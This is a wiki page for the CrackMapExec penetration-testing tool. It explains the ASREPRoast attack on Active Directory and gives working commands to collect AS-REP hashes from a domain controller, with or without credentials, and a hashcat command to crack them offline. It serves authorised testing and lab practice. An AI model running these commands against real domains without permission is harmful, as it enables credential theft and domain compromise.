πŸ”±
πŸ”±
πŸ”±
πŸ”±
CrackMapExec ~ CME WIKI
Public Release - v5.2.2@byt3bl33d3r@mpgn_x64
Search…
Introduction
πŸ”₯
News 2022
Changelog
Sponsoring CME
Other Gitbook
Getting Started
Installation
Selecting & Using a Protocol
Target Formats
Using Credentials
Using Kerberos
Using Modules
Database General Usage
πŸ†•
BloodHound integration
Report bugs or new features
πŸ’²
Audit Mode
SMB protocol
πŸ†•
Scan for vulnerabilities
Enumeration
Password spraying
Authentication
Command execution
Spidering Shares
Get and Put files
Obtaining Credentials
πŸ†•
Defeating LAPS
πŸ†•
Spooler, WebDav running ?
LDAP protocol
Authentication
ASREPRoast
Kerberoasting
Unconstrained delegation
Admin Count
Machine Account Quota
Get user descriptions
πŸ†•
Exploit ESC8 (adcs)
WINRM protocol
Password spraying
Authentication
Command execution
πŸ’²
Defeating LAPS
MSSQL protocol
Password spraying
Authentication
MSSQL Privesc
MSSQL command
Windows command
SSH protocol
Password spraying
Authentication
Command execution
πŸ’²
RDP Protocol
Password spraying
Install aardwolf lib
Powered By GitBook
ASREPRoast
Retrieve the Kerberos 5 AS-REP etype 23 hash of users without Kerberos pre-authentication required
You can retrieve the Kerberos 5 AS-REP etype 23 hash of users without Kerberos pre-authentication required if you have a list of users on the domain

Without authentication

The ASREPRoast attack looks for users without Kerberos pre-authentication required. That means that anyone can send an AS_REQ request to the KDC on behalf of any of those users, and receive an AS_REP message. This last kind of message contains a chunk of data encrypted with the original user key, derived from its password. Then, by using this message, the user password could be cracked offline. More detail in Kerberos theory.
1
cme ldap 192.168.0.104 -u harry -p '' --asreproast output.txt
Copied!
Using a wordlist, you can find wordlists of username here
1
cme ldap 192.168.0.104 -u user.txt -p '' --asreproast output.txt
Copied!
Set the password value to '' to perform the test without authentication

With authentication

If you have one valid credential on the domain, you can retrieve all the users and hashs where the Kerberos pre-authentication is not required
1
cme ldap 192.168.0.104 -u harry -p pass --asreproast output.txt
Copied!
Use option kdcHost when the domain name resolution fail
1
cme ldap 192.168.0.104 -u harry -p pass --asreproast output.txt --kdcHost domain_name
Copied!

Cracking with hashcat

To crack hashes on the file output.txt with hashcat use the following options:
1
hashcat -m18200 output.txt wordlist
Copied!

Example

Forest machine is a good example to test ASREPRoast with CrackMapExec
https://www.hackthebox.eu/home/machines/profile/212
www.hackthebox.eu

Ressources

Kerberos (II): How to attack Kerberos?
Tarlogic Security
AS-REP Roasting
Red Teaming Experiments
AS_REP Roasting
hackndo
​
​
LDAP protocol - Previous
Authentication
Next - LDAP protocol
Kerberoasting
Last modified 2mo ago
Copy link
Contents
Without authentication
With authentication
Cracking with hashcat
Example
Ressources